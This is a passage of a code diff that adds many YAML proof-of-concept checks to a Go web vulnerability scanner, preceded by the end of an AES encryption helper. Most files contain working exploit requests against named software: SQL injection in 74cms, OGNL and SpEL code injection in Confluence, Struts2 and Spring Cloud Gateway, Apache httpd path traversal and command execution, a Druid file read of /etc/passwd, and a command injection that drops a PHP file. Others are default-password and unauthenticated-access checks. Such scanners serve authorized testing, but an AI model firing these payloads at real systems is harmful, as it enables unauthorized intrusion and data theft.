+	}
+	block, err := aes.NewCipher(key)
+	if err != nil {
+		return ""
+	}
+	nonce := make([]byte, 16)
+	_, err = io.ReadFull(rand.Reader, nonce)
+	if err != nil {
+		return ""
+	}
+	aesgcm, _ := cipher.NewGCMWithNonceSize(block, 16)
+	ciphertext := aesgcm.Seal(nil, nonce, Content, nil)
+	return base64.StdEncoding.EncodeToString(append(nonce, ciphertext...))
+}
--- a/WebScan/pocs/74cms-sqli-1.yml
+++ b/WebScan/pocs/74cms-sqli-1.yml
@@ -0,0 +1,16 @@
+name: poc-yaml-74cms-sqli-1
+set:
+  rand: randomInt(200000000, 210000000)
+rules:
+  - method: POST
+    path: /plus/weixin.php?signature=da39a3ee5e6b4b0d3255bfef95601890afd80709\xc3\x97tamp=&nonce=
+    headers:
+      Content-Type: 'text/xml'
+    body: <?xml version="1.0" encoding="utf-8"?><!DOCTYPE copyright [<!ENTITY test SYSTEM "file:///">]><xml><ToUserName>&test;</ToUserName><FromUserName>1111</FromUserName><MsgType>123</MsgType><FuncFlag>3</FuncFlag><Content>1%' union select md5({{rand}})#</Content></xml>
+    follow_redirects: false
+    expression: |
+      response.body.bcontains(bytes(md5(string(rand))))
+detail:
+  author: betta(https://github.com/betta-cyber)
+  links:
+    - https://www.uedbox.com/post/29340
--- a/WebScan/pocs/74cms-sqli-2.yml
+++ b/WebScan/pocs/74cms-sqli-2.yml
@@ -0,0 +1,12 @@
+name: poc-yaml-74cms-sqli-2
+set:
+  rand: randomInt(200000000, 210000000)
+rules:
+  - method: GET
+    path: /plus/ajax_officebuilding.php?act=key&key=錦%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5({{rand}}),5,6,7,8,9%23
+    expression: |
+      response.body.bcontains(bytes(md5(string(rand))))
+detail:
+  author: rexus
+  links:
+    - https://www.uedbox.com/post/30019/
--- a/WebScan/pocs/74cms-sqli.yml
+++ b/WebScan/pocs/74cms-sqli.yml
@@ -0,0 +1,10 @@
+name: poc-yaml-74cms-sqli
+rules:
+  - method: GET
+    path: /index.php?m=&c=AjaxPersonal&a=company_focus&company_id[0]=match&company_id[1][0]=aaaaaaa") and extractvalue(1,concat(0x7e,md5(99999999))) -- a
+    expression: |
+      response.body.bcontains(b"ef775988943825d2871e1cfa75473ec")
+detail:
+  author: jinqi
+  links:
+    - https://www.t00ls.net/articles-54436.html
--- a/WebScan/pocs/CVE-2017-7504-Jboss-serialization-RCE.yml
+++ b/WebScan/pocs/CVE-2017-7504-Jboss-serialization-RCE.yml
@@ -0,0 +1,11 @@
+name: poc-yaml-CVE-2017-7504-Jboss-serialization-RCE
+rules:
+  - method: GET
+    path: /jbossmq-httpil/HTTPServerILServlet
+    expression: |
+      response.status == 200 && response.body.bcontains(b'This is the JBossMQ HTTP-IL')
+detail:
+  author: mamba
+  description: "CVE-2017-7504-Jboss-serialization-RCE by chaosec公众号"
+  links:
+    - https://github.com/chaosec2021
--- a/WebScan/pocs/CVE-2022-22947.yml
+++ b/WebScan/pocs/CVE-2022-22947.yml
@@ -0,0 +1,44 @@
+name: Spring-Cloud-CVE-2022-22947
+set:
+  router: randomLowercase(8)
+  rand1: randomInt(800000000, 1000000000)
+  rand2: randomInt(800000000, 1000000000)
+rules:
+  - method: POST
+    path: /actuator/gateway/routes/{{router}}
+    headers:
+      Content-Type: application/json
+    body: |
+      {
+        "id": "{{router}}",
+        "filters": [{
+          "name": "AddResponseHeader",
+          "args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"expr\",\"{{rand1}}\",\"+\",\"{{rand2}}\"}).getInputStream()))}"}
+        }],
+      "uri": "http://example.com",
+      "order": 0
+      }
+    expression: response.status == 201
+  - method: POST
+    path: /actuator/gateway/refresh
+    headers:
+      Content-Type: application/json
+    expression: response.status == 200
+  - method: GET
+    path: /actuator/gateway/routes/{{router}}
+    headers:
+      Content-Type: application/json
+    expression: response.status == 200 && response.body.bcontains(bytes(string(rand1 + rand2)))
+  - method: DELETE
+    path: /actuator/gateway/routes/{{router}}
+    expression: response.status == 200
+  - method: POST
+    path: /actuator/gateway/refresh
+    headers:
+      Content-Type: application/json
+    expression: response.status == 200
+detail:
+  author: jweny
+  description: Spring Cloud Gateway Code Injection
+  links:
+    - https://mp.weixin.qq.com/s/qIAcycsO_L9JKisG5Bgg_w
--- a/WebScan/pocs/CVE-2022-22954-VMware-RCE.yml
+++ b/WebScan/pocs/CVE-2022-22954-VMware-RCE.yml
@@ -0,0 +1,11 @@
+name: poc-yaml-CVE-2022-22954-VMware-RCE
+rules:
+  - method: GET
+    path: /catalog-portal/ui/oauth/verify?error=&deviceUdid=%24%7b"freemarker%2etemplate%2eutility%2eExecute"%3fnew%28%29%28"id"%29%7d
+    expression: |
+      response.status == 400 && "device id:".bmatches(response.body)
+detail:
+  author: mamba
+  description: "CVE-2022-22954-VMware-RCE by chaosec公众号"
+  links:
+    - https://github.com/chaosec2021
--- a/WebScan/pocs/CVE-2022-26134.yml
+++ b/WebScan/pocs/CVE-2022-26134.yml
@@ -0,0 +1,16 @@
+name: Confluence-CVE-2022-26134
+
+rules:
+ -  method: GET
+    path: /%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22id%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Cmd-Response%22%2C%23a%29%29%7D/
+    expression: response.status == 302 && "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.raw_header)
+detail:
+  author: zan8in
+  description: |
+    Atlassian Confluence OGNL注入漏洞
+    Atlassian Confluence是企业广泛使用的wiki系统。2022年6月2日Atlassian官方发布了一则安全更新，通告了一个严重且已在野利用的代码执行漏洞，攻击者利用这个漏洞即可无需任何条件在Confluence中执行任意命令。
+    app="ATLASSIAN-Confluence"
+  links:
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-26134
+    - http://wiki.peiqi.tech/wiki/webapp/AtlassianConfluence/Atlassian%20Confluence%20OGNL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%20CVE-2022-26134.html
+    - https://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247488978&idx=1&sn=c0a5369f2b374dcef0bbf61b9239b1dd
--- a/WebScan/pocs/Hotel-Internet-Manage-RCE.yml
+++ b/WebScan/pocs/Hotel-Internet-Manage-RCE.yml
@@ -0,0 +1,15 @@
+name: Hotel-Internet-Manage-RCE
+rules:
+  - method: GET
+    path: "/manager/radius/server_ping.php?ip=127.0.0.1|cat /etc/passwd >../../Test.txt&id=1"
+    headers:
+      User-Agent: "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"
+      Accept-Encoding: "gzip,deflate"
+    expression: |
+      response.status == 200 && response.body.bcontains(b"parent.doTestResult")
+detail:
+  author: test
+  Affected Version: "Hotel Internet Billing & Operation Support System"
+  links:
+    - http://118.190.97.19:88/qingy/Web%E5%AE%89%E5%85%A8
+    
--- a/WebScan/pocs/Struts2-062-cve-2021-31805-rce.yml
+++ b/WebScan/pocs/Struts2-062-cve-2021-31805-rce.yml
@@ -0,0 +1,31 @@
+name: poc-yaml-struts2-062-cve-2021-31805-rce
+rules:
+  - method: POST
+    path: /
+    headers:
+      Content-Type: 'multipart/form-data; boundary=----WebKitFormBoundaryl7d1B1aGsV2wcZwF'
+      Cache-Control: 'max-age=0'
+      Accept: 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9'
+
+    body: "\
+        ------WebKitFormBoundaryl7d1B1aGsV2wcZwF\r\n\
+        Content-Disposition: form-data; name=\"id\"\r\n\r\n\
+        %{\r\n\
+        (#request.map=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\r\n\
+        (#request.map.setBean(#request.get('struts.valueStack')) == true).toString().substring(0,0) +\r\n\
+        (#request.map2=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\r\n\
+        (#request.map2.setBean(#request.get('map').get('context')) == true).toString().substring(0,0) +\r\n
+        (#request.map3=#@org.apache.commons.collections.BeanMap@{}).toString().substring(0,0) +\r\n\
+        (#request.map3.setBean(#request.get('map2').get('memberAccess')) == true).toString().substring(0,0) +\r\n\
+        (#request.get('map3').put('excludedPackageNames',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\r\n\
+        (#request.get('map3').put('excludedClasses',#@org.apache.commons.collections.BeanMap@{}.keySet()) == true).toString().substring(0,0) +\r\n
+        (#application.get('org.apache.tomcat.InstanceManager').newInstance('freemarker.template.utility.Execute').exec({'cat /etc/passwd'}))\r\n
+        }\r\n\
+        ------WebKitFormBoundaryl7d1B1aGsV2wcZwF—
+        "
+    expression: |
+      response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
+detail:
+  author: Jaky
+  links:
+    - https://mp.weixin.qq.com/s/taEEl6UQ2yi4cqzs2UBfCg
--- a/WebScan/pocs/active-directory-certsrv-detect.yml
+++ b/WebScan/pocs/active-directory-certsrv-detect.yml
@@ -0,0 +1,11 @@
+name: poc-yaml-active-directory-certsrv-detect
+rules:
+  - method: GET
+    path: /certsrv/certrqad.asp
+    follow_redirects: false
+    expression: |
+      response.status == 401 && "Server" in response.headers && response.headers["Server"].contains("Microsoft-IIS") && response.body.bcontains(bytes("401 - ")) && "Www-Authenticate" in response.headers && response.headers["Www-Authenticate"].contains("Negotiate") && "Www-Authenticate" in response.headers && response.headers["Www-Authenticate"].contains("NTLM")
+detail:
+  author: AgeloVito
+  links:
+    - https://www.cnblogs.com/EasonJim/p/6859345.html
--- a/WebScan/pocs/activemq-default-password.yml
+++ b/WebScan/pocs/activemq-default-password.yml
@@ -0,0 +1,16 @@
+name: poc-yaml-activemq-default-password
+rules:
+  - method: GET
+    path: /admin/
+    expression: |
+      response.status == 401 && response.body.bcontains(b"Unauthorized")
+  - method: GET
+    path: /admin/
+    headers:
+      Authorization: Basic YWRtaW46YWRtaW4=
+    expression: |
+      response.status == 200 && response.body.bcontains(b"Welcome to the Apache ActiveMQ Console of") && response.body.bcontains(b"<h2>Broker</h2>")
+detail:
+  author: pa55w0rd(www.pa55w0rd.online/)
+  links:
+    - https://blog.csdn.net/ge00111/article/details/72765210
--- a/WebScan/pocs/airflow-unauth.yml
+++ b/WebScan/pocs/airflow-unauth.yml
@@ -0,0 +1,10 @@
+name: poc-yaml-airflow-unauth
+rules:
+  - method: GET
+    path: /admin/
+    expression: |
+      response.status == 200 && response.body.bcontains(b"<title>Airflow - DAGs</title>") && response.body.bcontains(b"<h2>DAGs</h2>")
+detail:
+  author: pa55w0rd(www.pa55w0rd.online/)
+  links:
+    - http://airflow.apache.org/
--- a/WebScan/pocs/alibaba-canal-default-password.yml
+++ b/WebScan/pocs/alibaba-canal-default-password.yml
@@ -0,0 +1,19 @@
+name: poc-yaml-alibaba-canal-default-password
+rules:
+  - method: POST
+    path: /api/v1/user/login
+    expression: |
+      response.status == 200 && response.body.bcontains(b"com.alibaba.otter.canal.admin.controller.UserController.login")
+  - method: POST
+    path: /api/v1/user/login
+    headers:
+      Content-Type: application/json
+    body: >-
+      {"username":"admin","password":"123456"}
+    follow_redirects: false
+    expression: |
+      response.status == 200 && response.body.bcontains(b"{\"code\":20000,") && response.body.bcontains(b"\"data\":{\"token\"")
+detail:
+  author: jweny(https://github.com/jweny)
+  links:
+    - https://www.cnblogs.com/xiexiandong/p/12888582.html
--- a/WebScan/pocs/alibaba-canal-info-leak.yml
+++ b/WebScan/pocs/alibaba-canal-info-leak.yml
@@ -0,0 +1,12 @@
+name: poc-yaml-alibaba-canal-info-leak
+rules:
+  - method: GET
+    path: /api/v1/canal/config/1/1
+    follow_redirects: false
+    expression: |
+      response.status == 200 && response.content_type.icontains("application/json") && response.body.bcontains(b"ncanal.aliyun.accessKey") && response.body.bcontains(b"ncanal.aliyun.secretKey")
+detail:
+  author: Aquilao(https://github.com/Aquilao)
+  info: alibaba Canal info leak
+  links:
+    - https://my.oschina.net/u/4581879/blog/4753320
--- a/WebScan/pocs/alibaba-nacos-v1-auth-bypass.yml
+++ b/WebScan/pocs/alibaba-nacos-v1-auth-bypass.yml
@@ -0,0 +1,27 @@
+name: poc-yaml-alibaba-nacos-v1-auth-bypass
+set:
+  r1: randomLowercase(16)
+  r2: randomLowercase(16)
+rules:
+  - method: POST
+    path: "/nacos/v1/auth/users?username={{r1}}&password={{r2}}"
+    headers:
+      User-Agent: Nacos-Server
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes("create user ok!"))
+  - method: GET
+    path: "/nacos/v1/auth/users?pageNo=1&pageSize=999"
+    headers:
+      User-Agent: Nacos-Server
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes(r1))
+  - method: DELETE
+    path: "/nacos/v1/auth/users?username={{r1}}"
+    headers:
+      User-Agent: Nacos-Server
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes("delete user ok!"))
+detail:
+  author: kmahyyg(https://github.com/kmahyyg)
+  links:
+    - https://github.com/alibaba/nacos/issues/4593
--- a/WebScan/pocs/alibaba-nacos.yml
+++ b/WebScan/pocs/alibaba-nacos.yml
@@ -0,0 +1,13 @@
+name: poc-yaml-alibaba-nacos
+rules:
+  - method: GET
+    path: /nacos/
+    follow_redirects: true
+    expression: |
+      response.body.bcontains(bytes("<title>Nacos</title>"))
+detail:
+  author: AgeloVito
+  info: alibaba-nacos
+  login: nacos/nacos
+  links:
+    - https://blog.csdn.net/caiqiiqi/article/details/112005424
--- a/WebScan/pocs/amtt-hiboss-server-ping-rce.yml
+++ b/WebScan/pocs/amtt-hiboss-server-ping-rce.yml
@@ -0,0 +1,18 @@
+name: poc-yaml-amtt-hiboss-server-ping-rce
+set:
+  r2: randomLowercase(10)
+rules:
+  - method: GET
+    path: /manager/radius/server_ping.php?ip=127.0.0.1|echo%20"<?php%20echo%20md5({{r2}});unlink(__FILE__);?>">../../{{r2}}.php&id=1
+    expression: |
+      response.status == 200 && response.body.bcontains(b"parent.doTestResult")
+  - method: GET
+    path: /{{r2}}.php
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes(md5(r2)))
+
+detail:
+  author: YekkoY
+  description: "安美数字-酒店宽带运营系统-远程命令执行漏洞"
+  links:
+    - http://wiki.peiqi.tech/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E5%AE%89%E7%BE%8E%E6%95%B0%E5%AD%97/%E5%AE%89%E7%BE%8E%E6%95%B0%E5%AD%97%20%E9%85%92%E5%BA%97%E5%AE%BD%E5%B8%A6%E8%BF%90%E8%90%A5%E7%B3%BB%E7%BB%9F%20server_ping.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html
--- a/WebScan/pocs/apache-ambari-default-password.yml
+++ b/WebScan/pocs/apache-ambari-default-password.yml
@@ -0,0 +1,11 @@
+name: poc-yaml-apache-ambari-default-password
+rules:
+  - method: GET
+    path: /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name
+    headers:
+      Authorization: Basic YWRtaW46YWRtaW4=
+    expression: response.status == 200 && response.body.bcontains(b"PrivilegeInfo") && response.body.bcontains(b"AMBARI.ADMINISTRATOR")
+detail:
+    author: wulalalaaa(https://github.com/wulalalaaa)
+    links:
+        - https://cwiki.apache.org/confluence/display/AMBARI/Quick+Start+Guide
--- a/WebScan/pocs/apache-axis-webservice-detect.yml
+++ b/WebScan/pocs/apache-axis-webservice-detect.yml
@@ -0,0 +1,25 @@
+name: poc-yaml-apache-axis-webservice-detect
+sets:
+  path:
+    - services
+    - servlet/AxisaxiServlet
+    - servlet/AxisServlet
+    - services/listServices
+    - services/FreeMarkerService
+    - services/AdminService
+    - axis/services
+    - axis2/services
+    - axis/servlet/AxisServlet
+    - axis2/servlet/AxisServlet
+    - axis2/services/listServices
+    - axis/services/FreeMarkerService
+    - axis/services/AdminService
+rules:
+  - method: GET
+    path: /{{path}}
+    expression: |
+      response.body.bcontains(b"Services") && response.body.bcontains(b'?wsdl"><i>')
+detail:
+  author: AgeloVito
+  links:
+    - https://paper.seebug.org/1489
--- a/WebScan/pocs/apache-druid-cve-2021-36749.yml
+++ b/WebScan/pocs/apache-druid-cve-2021-36749.yml
@@ -0,0 +1,24 @@
+name: poc-yaml-apache-druid-cve-2021-36749
+manual: true
+transport: http
+groups:
+  druid1:
+  - method: POST
+    path: /druid/indexer/v1/sampler?for=connect
+    headers:
+      Content-Type: application/json;charset=utf-8
+    body: |
+      {"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"http","uris":["file:///etc/passwd"]}}},"samplerConfig":{"numRows":500}}
+    expression: response.status == 200 && response.content_type.contains("json") && "root:[x*]:0:0:".bmatches(response.body)
+  druid2:
+  - method: POST
+    path: /druid/indexer/v1/sampler?for=connect
+    headers:
+      Content-Type: application/json;charset=utf-8
+    body: |
+      {"type":"index","spec":{"ioConfig":{"type":"index","firehose":{"type":"http","uris":["file:///c://windows/win.ini"]}}},"samplerConfig":{"numRows":500}}
+    expression: response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"for 16-bit app support")
+detail:
+  author: iak3ec(https://github.com/nu0l)
+  links:
+    - https://mp.weixin.qq.com/s/Fl2hSO-y60VsTi5YJFyl0w
--- a/WebScan/pocs/apache-flink-upload-rce.yml
+++ b/WebScan/pocs/apache-flink-upload-rce.yml
@@ -7,8 +7,7 @@ rules:
      path: /jars
      follow_redirects: true
      expression: >
-        response.status == 200 && response.content_type.contains("json") &&
-        response.body.bcontains(b"address") && response.body.bcontains(b"files")
+        response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"address") && response.body.bcontains(b"files")
    - method: POST
      path: /jars/upload
      headers:
@@ -23,8 +22,7 @@ rules:

      follow_redirects: true
      expression: >
-        response.status == 200 && response.content_type.contains("json") &&
-        response.body.bcontains(b"success") && response.body.bcontains(bytes(r2))
+        response.status == 200 && response.content_type.contains("json") && response.body.bcontains(b"success") && response.body.bcontains(bytes(r2))
      search: >-
        (?P<filen>([a-zA-Z0-9]{8}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{4}-[a-zA-Z0-9]{12}_[a-z]{4}.jar))
    - method: DELETE
--- a/WebScan/pocs/apache-httpd-cve-2021-40438-ssrf.yml
+++ b/WebScan/pocs/apache-httpd-cve-2021-40438-ssrf.yml
@@ -0,0 +1,12 @@
+name: poc-yaml-apache-httpd-cve-2021-40438-ssrf
+manual: true
+transport: http
+rules:
+  - method: GET
+    path: /?unix:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA|http://baidu.com/api/v1/targets
+    follow_redirects: false
+    expression: response.status == 302 && response.headers["Location"] == "http://www.baidu.com/search/error.html"
+detail:
+  author: Jarcis-cy(https://github.com/Jarcis-cy)
+  links:
+    - https://github.com/vulhub/vulhub/blob/master/httpd/CVE-2021-40438
--- a/WebScan/pocs/apache-httpd-cve-2021-41773-path-traversal.yml
+++ b/WebScan/pocs/apache-httpd-cve-2021-41773-path-traversal.yml
@@ -0,0 +1,16 @@
+name: poc-yaml-apache-httpd-cve-2021-41773-path-traversal
+groups:
+  cgibin:
+    - method: GET
+      path: /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd
+      expression: |
+        response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
+  icons:
+    - method: GET
+      path: /icons/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/etc/passwd
+      expression: |
+        response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
+detail:
+  author: JingLing(https://github.com/shmilylty)
+  links:
+    - https://mp.weixin.qq.com/s/XEnjVwb9I0GPG9RG-v7lHQ
--- a/WebScan/pocs/apache-httpd-cve-2021-41773-rce.yml
+++ b/WebScan/pocs/apache-httpd-cve-2021-41773-rce.yml
@@ -0,0 +1,14 @@
+name: poc-yaml-apache-httpd-cve-2021-41773-rce
+set:
+  r1: randomInt(800000000, 1000000000)
+  r2: randomInt(800000000, 1000000000)
+rules:
+  - method: POST
+    path: /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/bin/sh
+    body: echo;expr {{r1}} + {{r2}}
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes(string(r1 + r2)))
+detail:
+  author: B1anda0(https://github.com/B1anda0)
+  links:
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-41773
--- a/WebScan/pocs/apache-kylin-unauth-cve-2020-13937.yml
+++ b/WebScan/pocs/apache-kylin-unauth-cve-2020-13937.yml
@@ -0,0 +1,10 @@
+name: poc-yaml-apache-kylin-unauth-cve-2020-13937
+rules:
+  - method: GET
+    path: /kylin/api/admin/config
+    expression: |
+      response.status == 200 && response.headers["Content-Type"].contains("application/json") && response.body.bcontains(b"config") && response.body.bcontains(b"kylin.metadata.url")
+detail:
+  author: JingLing(github.com/shmilylty)
+  links:
+    - https://s.tencent.com/research/bsafe/1156.html
--- a/WebScan/pocs/apache-nifi-api-unauthorized-access.yml
+++ b/WebScan/pocs/apache-nifi-api-unauthorized-access.yml
@@ -0,0 +1,12 @@
+name: poc-yaml-apache-nifi-api-unauthorized-access
+manual: true
+transport: http
+rules:
+  - method: GET
